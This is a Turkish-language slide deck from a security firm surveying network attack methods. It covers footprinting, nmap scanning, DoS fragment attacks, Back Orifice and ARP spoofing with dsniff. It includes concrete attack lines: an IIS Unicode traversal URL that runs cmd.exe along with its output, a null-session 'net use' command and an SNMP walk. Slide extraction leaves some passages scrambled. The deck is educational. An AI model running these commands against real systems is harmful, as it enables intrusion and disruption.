SALDIRI YÖNTEMLERY NTEMLERİ ASES Bilgi Güvenlik Teknolojileri Osman Veysel ERDAĞ CCIE-Security (#11211) veysel@ases-bgt.com.tr
FBI/CSI 2002 Yılı Araştırması Araştırmaya katılan 503 firmanın %90 ı son 12 ay içinde saldırıya uğramıştı.. Atakların %70 i dışardan %30 u içerden Bu şirketlerin %80 i finansal kayba uğrarken kaybını hesaplayabilen 223 şirketin toplam zararı: $456 Milyon. SaldırıTipleri: Şirketlerin %40 ında Sisteme Yetkisiz Erişim. Şirketlerin %40 sında Servis Engelleme Şirketlerin %34 sında Bilgi Hırsızlığı Şirketlerin %78 inde Internetin Kötüye
Atak Yöntemleri ve Gelişme Süreçleri üksek Arka Kapılar Bilinen Zafiyetlerin Kullanımı Sniffer lar Tarayıcılar Kalkanlanmış Tarama Paket Değiştirme-Kandırma Session Hijack Denetimin Engellenmesi Saldırı Araçlarının Karmaşıklık Düzeyi Şifre Kırma Şifre Tahmini Kendini Çoğaltabilen Kodlar Virüsler Teknik Bilgi Gereksinimi Düşük 1980 1990 2000 2005
Saldırıların Nedenleri Üç ana neden: Güvenlik Politikası Zafiyetleri Konfigürayon Zafiyetleri Teknoloji Zafiyetleri...Ve bu zafiyetleri kullanmaya çok istekli olan insanlar
Güvenlik Politikası Açıkları Yazılı bir güvenlik politikasının bulunmaması Şirket içi politik çekişmeler Hızlı personel sirkülasyonu Donanım erişim kontrollerinin zayıflığı Güvenlik yönetiminin ve politikaların takibinde aksaklıklar yaşanması Saldırıya uğranıldığının anlaşılamaması Belirlenen politikaya uygun olmayan şekilde yazılım ve donanım kurulması
Konfigürasyon Açıkları Ürünler üzerinde default ayarların bırakılması Network donanımlarının konfigürasyonlarının yanlış yapılması Kullanıcı hesaplarının güvenlik düzeylerinin düşük tutulması Kırılmaları kolay şifrelerin kullanılması Internet servislerinin yanlış konfigürasyonları
Teknoloji Zafiyetleri TCP/IP zafiyetleri İşletim sistemi zafiyetleri Network donanımı zafiyetleri
TCP Paket Formatı 0 15 16 31 Kaynak Port Numarası Hedef Port Numarası Sıra Numarası Onaylama Numarası Uzunluk Bayraklar Pencere Hata Kontrol Kodu (Checksum) Urgent Pointer Seçenekler Padding DATA... URG ACK PSH RST SYN FIN
TCP Paketi İletimi SYN SYN/ACK ACK
İşletim Sistemi Zafiyetleri Source: WWW.SecurityFocus.Com
Saldırıların Amaçları 100101 Sniffer ile Bilginin Gözlenmesi (Mahremiyetin Kaybı) Bilginin Çalınması Ben Ahmet: Bankayla yapılan anlaşmanın metnini gönderin. 100 Milyon TL 100 Milyar TL Ahmet Kimlik Aldatmacası (Bilginin Yönlendirilmesi) Veri Bütünlüğünün Kaybedilmesi (Veri Değiştirme)
Saldırı Aşamaları İz Sürme (Footprinting) Saldırı noktası ile ilgili bilgi toplama Adres, telefon, ilgili kişiler, DNS kayıtları, vb. Network e erişim yollarının belirlenmesi Tarama(Scanning) Çalışan servislerin belirlenmesi. Açık portların belirlenmesi. İşletim sisteminin belirlenmesi. Erişim Sisteme giriş, sistem kaynaklarının kullanımı. Saldırı Sisteme doğrudan saldırılar. Üçüncü sistemlere saldırı.
İz Sürme Web sayfaları ve kurumla yapılan telefon görüşmeleri ile adres, telefon bilgilerinin alınması, e-mail adresleri ve ilgili kişilerin belirlenmesi. DNS kayıtlarının incelenmesi (nslookup), web ve mail sunucuları ile varsa diğer sunucuların IP adreslerinin öğrenilmesi. Hedefteki ağa erişilecek yol üzerindeki bağlantıların belirlenmesi (traceroute). Ağ girişindeki firewall un belirlenmesi ve kontrol edilmesi (traceroute).
Tarama [whitehat]$ fping f in.txt 192.168.1.254 is alive Ping 192.168.1.227 taraması: fping, nmap. [whitehat]$ strobe is alive 192.168.1.10 ICMP [whitehat]$ 192.168.1.10 taraması: nmap echo icmpquery. sp 192.168.1.0/24 7/tcp Echo Çalışan Starting 192.168.1.10 servislerin nmap sunrpc v.2.53 belirlenmesi: 111/tcp rpcbind Host (192.168.1.0) seems to be a subnet broadcast Port [whitehat]$ taraması: nmap strobe, ss 192.168.1.1 udp_scan, netcat, nmap, netscan, Host Starting (192.168.1.1) superscan,ipeye, nmap v.2.53 appers to vb. be up Host Port (192.168.1.10) State Protocol appers to be up) Service [whitehat]$ nmap p80 O 192.168.1.1 İşletim 21 sisteminin open tcp belirlenmesi ftp Starting nmap v.2.53 İşletim 80 sisteminin open tcp taramalara verdiği http Port State Protocol Service yanıtların değerlendirilmesi 139 open tcp netbios-ssn 21 open tcp ftp Aktif değerlendirme: TCP window size, TCP options, 80 Fragmantasyon open yöntemi. tcp http TCP Sequence Pasif değerlendirme: Prediction: Class=random TTL, windows positive size, DF increments seçeneği. Difficulty=26590 (Worthy challenge) Remote operating system guess: Solaris 2.5, 2.51 Ağ da bulunan ve çalışan sistemlerin belirlenmesi:
Tarama Biçimleri SYN(port:53) SYN/ACK SYN(port:53) SYN/ACK SYN Taraması FIN(port:53) RST FIN(port:25) RST FIN Taraması FIN/URG/PUSH RST FIN/URG/PUSH RST XMAS (Noel) Taraması UDP ICMP UDP ICMP UDP Taraması
Erişim Basit ve masum araçlar: Null sessions: c:\>net use \\192.168.1.1\IPC$ /u: NetBIOS komutları: nbstat, net view, vb. SNMP kullanımı. c:>snmputil walk 192.168.1.1 public.1.3.6.1.4.1.77.1.2.25
Saldırı Tipleri (Örnekler) Başlık İçerik Ping of Death Land MS IE DNS Atak Atomik (Tek paket) Port Tarama SYN Atak TCP Kesme Telnet Karakter Mod Atak Kompozit
Sistem Saldırıları Şifre atakları Sistem yöneticisi düzeyinde erişim. İkincil erişim. Uzaktan erişim
Back Orifice (Arka Kapı) İstemci-server mimarisi DOS komutları kullanımı dir, cd, copy, del ve benzeri Sistem gezintisi için HTTP server Dosya yükleme, indirme ve görüntüleyebilme Yazıcı paylaşımı, ses donanımı kullanımı Bellekte tutulan (cached) password lerin görüntülenmesi Portların yeniden yönlendirimi Ve benzeri...
Ağ Erişim Atakları Tampon taşması (buffer overflow) Unicode: Her bir karakter, kullanılan dil, platform ve programdan bağımsız olarak unicode olarak adlandırılan numaralarla gösterilebilir. CmdASP: Microsoft tarafından geliştirilen ve HTML dosyaları ile script kodların birarada kullanılmasını sağlayan Aktive Server Pages in kulanımıdır.
UNICODE ile HTTP Üzerinden Komut Çalıştırılması http:hedef.com.tr/scripts..%c1%1c..winnt/system32/cmd.exe?/c+dir+c:\ SONUÇ: Directory of c:\ 2000-08-08 18:28 Inetpub 2000-08-09 09:58 Install 2000-08-09 11:17 MDaemon 2000-09-01 09:01 MSSQL7 2000-08-29 13:03 news 2000-10-18 02:53 ooo 2000-10-18 01:37 Program Files 2000-08-09 17:54 sttco 2000-10-17 11:48 WINNT 2000-10-18 02:02 wwww 2000-09-26 12:03 1 File(s) 28,160 bytes 14 Dir(s) 6,377,992,192 bytes free NOT:%c0%af ve %c1%9c, ve \ karakterlerinin UNICODE gösterimleridir.
Servis Engelleme Kaynakları aşırı yükleme Pingflood Yarı açık SYN atakları Paket fırtınası Band dışı servis engelleme atakları Standart dışı paketler (Büyük paketler). Üstüste bindirilmiş paketler. Parçalanmış paketler. UDP bombardımanı Diğer ataklar.
Servis Engelleme Atakları Parçalanmış Paket Atakları: Ping O Death Teardrop Unnamed ICMP Atakları Smurf WinFreeze TFN Loki
Ölümcül Ping (Ping O Death) Frag 1 Frag 2 Frag n Fragmanların toplam uzunluğu > 65535 65.535 65.535: Maksimum IP datagram büyüklüğü. Birleştirilen fragmanların uzunluğu 65.535 i aştığında sistemler çakılabilir, donabilir.
Teardrop 1.Fragman: 36 bytes 0-35 bytes. Ofset 0 2.Fragman: 4 bytes 24-27 bytes. Ofset 24 Birleştirilmiş fragmanlar Byte 0 Byte 35 Byte 24 Byte 27 Byte 0 Byte 24 Byte 27 Byte 35 Birinci parça 0 ve 35. byte ları içeren 36 byte tan oluşurken ofseti 0 dir. İkinci parça sadece 4 byte tan oluşur ve ofseti 24 tür. İki parça birleştirildiğinde, iki parçanın üstüste binmesi sonucu oluşan paket sistemin kilitlenmesine yada donmasına neden olur.
İsimsiz (Unnamed) Atak Byte 0 Byte 24 1.Fragman: 25 bytes 0-24 bytes. Ofset 0 2.Fragman: 9 bytes 27-35 bytes. Ofset 27 Birleştirilmiş fragmanlar Byte 27 Byte 35 Byte 0 Byte 24 Byte 27 Byte 35 Eksik Data Birinci parça 0 ve 24. Byte ları içeren 25 byte tan oluşurken ofseti 0 dir. İkinci parça sadece 9 byte tan oluşur ve ofseti 27 dir. İki parça birleştirildiğinde oluşan paketin ortasında eksik data bulunduğundan sistemin kilitlenebilir.
SMURF Atağı ICMP REQ. D=172.16.2.2 S=192.168.5.1 ICMP REQ. D=172.16.2.2 S=192.168.5.2 ICMP REQ. D=172.16.2.2 S=192.168.5.3 ICMP REQ. D=172.16.2.2 S=192.168.5.4 ICMP REQ. D=172.16.2.2 S=192.168.5.5 ICMP REQ. D=192.168.5.255 S=172.16.2.2
Tribe Flood Network (TFN) Atağı ICMP, TCP, UDP Atağı ICMP, TCP, UDP Atağı ICMP, TCP, UDP Atağı ICMP, TCP, UDP Atağı ICMP, TCP, UDP Atağı ICMP, TCP, UDP Atağı TFN Komut Paketleri TFN Master
Ateş Üstünde Yürüme FireWalking internet Port:53 e (DNS) gönderilen traceroute (ICMP-UDP) paketleri Saldırı bilgisayarı Firewall dan tarafından geçen ICMP-UDP düşürülen paketleri ICMP-UDP paketleri
Ağ Anahtarlarına Yapılan Saldırılar: DSNIFF ARP kandırmacası MAC taşması Seçilebilir izleme SSH / SSL gözlemekesme Dug Song, DSNIFF in yaratıcısı www.monkey.org/~dugsong/dsniff
ARP Kandırmacası [root@sconvery-lnx dsniff-2.3]#./arpspoof 15.1.1.1 0:4:43:f2:d8:1 ff:ff:ff:ff:ff:ff 0806 42: arp reply C:\>test 15.1.1.1 is-at 0:4:4e:f2:d8:1 0:4:43:f2:d8:1 ff:ff:ff:ff:ff:ff 0806 42: arp reply C:\>arp -d 15.1.1.1 15.1.1.1 is-at 0:4:4e:f2:d8:1 0:4:43:f2:d8:1 ff:ff:ff:ff:ff:ff 0806 42: arp reply C:\>ping -n 1 15.1.1.1 15.1.1.1 is-at 0:4:4e:f2:d8:1 0:4:43:f2:d8:1 ff:ff:ff:ff:ff:ff 0806 42: arp reply Pinging 15.1.1.1 with 32 bytes 15.1.1.1 of data: is-at 0:4:4e:f2:d8:1 Reply from 15.1.1.1: bytes=32 time<10ms TTL=255 C:\>arp -a Interface: 15.1.1.26 on Interface 2 Internet Address Physical Address Type 15.1.1.1 00-04-4e-f2-d8-01 dynamic 15.1.1.25 00-10-83-34-29-72 dynamic C:\>arp -a Interface: 15.1.1.26 on Interface 2 Internet Address Physical Address Type 15.1.1.1 00-10-83-34-29-72 dynamic 15.1.1.25 00-10-83-34-29-72 dynamic
Ağ Anahtarlarında DSNIFF ile MAC Tablosu Taşması [root@sconvery-lnx dsniff-2.3]#./macof 101.59.29.36 -> 60.171.137.91 TCP D=55934 S=322 Syn Seq=1210303300 Len=0 Win=512 145.123.46.9 -> 57.11.96.103 TCP D=44686 S=42409 Syn Seq=1106243396 Len=0 Win=52 109.40.136.24 -> 51.158.227.98 TCP D=59038 S=21289 Syn Seq=2039821840 Len=0 Win2 126.121.183.80 -> 151.241.231.59 TCP D=7519 S=34044 Syn Seq=310542747 Len=0 Win2 211.28.168.72 -> 91.247.223.23 TCP D=62807 S=53618 Syn Seq=2084851907 Len=0 Win2 183.159.196.56 -> 133.10.138.87 TCP D=23929 S=51034 Syn Seq=1263121444 Len=0 Wi2 19.113.88.77 -> 16.189.146.61 TCP D=1478 S=56820 Syn Seq=609596358 Len=0 Win=512 237.162.172.114 -> 51.32.8.36 TCP D=38433 S=31784 Syn Seq=410116516 Len=0 Win2 118.34.90.6 -> 61.169.58.50 TCP D=42232 S=31424 Syn Seq=1070019027 Len=0 Win=52 46.205.246.13 -> 72.165.185.7 TCP D=56224 S=34492 Syn Seq=937536798 Len=0 Win=52 105.109.246.116 -> 252.233.209.72 TCP D=23840 S=45783 Syn Seq=1072699351 Len=0 2 60.244.56.84 -> 142.93.179.59 TCP D=3453 S=4112 Syn Seq=1964543236 Len=0 Win=512 151.126.212.86 -> 106.205.161.66 TCP D=12959 S=42911 Syn Seq=1028677526 Len=0 W2 9.121.248.84 -> 199.35.30.115 TCP D=33377 S=31735 Syn Seq=1395858847 Len=0 Win=2 226.216.132.20 -> 189.89.89.110 TCP D=26975 S=57485 Syn Seq=1783586857 Len=0 Wi2 124.54.134.104 -> 235.83.143.109 TCP D=23135 S=55908 Syn Seq=852982595 Len=0 Wi2 27.54.72.62 -> 207.73.65.108 TCP D=54512 S=25534 Syn Seq=1571701185 Len=0 Win=2 246.109.199.72 -> 1.131.122.89 TCP D=61311 S=43891 Syn Seq=1443011876 Len=0 Win2 251.49.6.89 -> 18.168.34.97 TCP D=25959 S=956 Syn Seq=6153014 Len=0 Win=512 51.105.154.55 -> 225.89.20.119 TCP D=33931 S=1893 Syn Seq=116924142 Len=0 Win=52 82.2.236.125 -> 210.40.246.122 TCP D=43954 S=49355 Syn Seq=1263650806 Len=0 Win2 21.221.14.15 -> 9.240.58.59 TCP D=61408 S=26921 Syn Seq=464123137 Len=0 Win=512 70.63.102.43 -> 69.88.108.26 TCP D=61968 S=53055 Syn Seq=682544782 Len=0 Win=512
CAM Tablosu Dolduğunda! DSNIFF macof komutu ile her bir anahtar için dakikada 155.000 MAC adres girişi üretebilir. CAM tablosu dolduğunda, tabloda yeralmayan bir adres anahtara gelirse bu trafik bütün VLAN içinde görülebilir duruma gelir. 10.1.1.22 -> (broadcast) ARP C Who is 10.1.1.1, 10.1.1.1? 10.1.1.22 -> (broadcast) ARP C Who is 10.1.1.19, 10.1.1.19? 15.1.1.26 -> 15.1.1.25 ICMP Echo request (ID: 256 Sequence number: 7424) OOPS 15.1.1.25 -> 15.1.1.26 ICMP Echo reply (ID: 256 Sequence number: 7424) OOPS
Internet Üzerinde Yüzlerce Araç Bulunabilir www.test.com Connected to www.test.com
En Çok Görülen Güvenlik Açıkları Açıklardan yararlanarak bilgi sızdırılması Gereksiz DMZ servisleri Konfigürasyonu yanlış yapılmış Zayıf, kolayca tahmin Çalışan servisler (DNS, çalıştıran sunucular internet kolay servisleri: edilebilen ve tekrar tekrar FTP, SMTP, vb) hedefleri oluştururlar. Anonymous FTP kullanılan şifreler sunucuları Kullanıcılar bağlantılara yazma kolay hakkı. hedeflere Güncellemesi dönüştürürler. LAN yapılmamış, Kullanıcı grupları Web sunucular üzerinde eskimiş, açıkları bulunan, Router üzerinde Erişim CGI ve ASP script ler. default konfigürasyonda Uygulamalar Denetim Listelerinin bırakılmış yazılımlar. İşletim gerektiği sistemleri, gibi İletişim Sınır İç versiyonlar. uygulanmaması. ağı aktivitelerinin uygun Gözden geçirilmiş, kabul edilmiş bir şekilde Yönlendiricisi Yönlendirici Sonuç: gözlenmemeleri. Konfigürasyonu ve yazılı bir güvenlik politikasının ICMP İnternet yanlış yapılmış IP bulunmaması! Firewall ile erişimin NetBIOS üzerinden Gereğinden fazla paylaşım sağlanması. bilgi sızdırılması hakkı verilmiş olan dosya DMZ de bulunan ve dizinler( NT paylaşımları, Firewall sunuculara yetkisiz UNIX NFS). Gereğinden çok erişim. Yüksek düzeyde trust haklara sahip kullanıcı LAN Mobil kullanıcılara erişim ilişkileri (NT Domain trust, ve test hesapları sağlayan,uzaktan erişim UNIX.rhosts ve hosts.equiv hedefleri saldırı noktalarının güvenliğinin noktalarını arttırır. Mobil dosyaları). sağlanmaması, trafiğin Kullanıcılar kontrol edilmemesi Sonuç: İletişim güvenlik ağınızda, içeriye doğru Bölge Ofisi açılmış büyük delikler
TEŞEKKÜRLER EKKÜRLER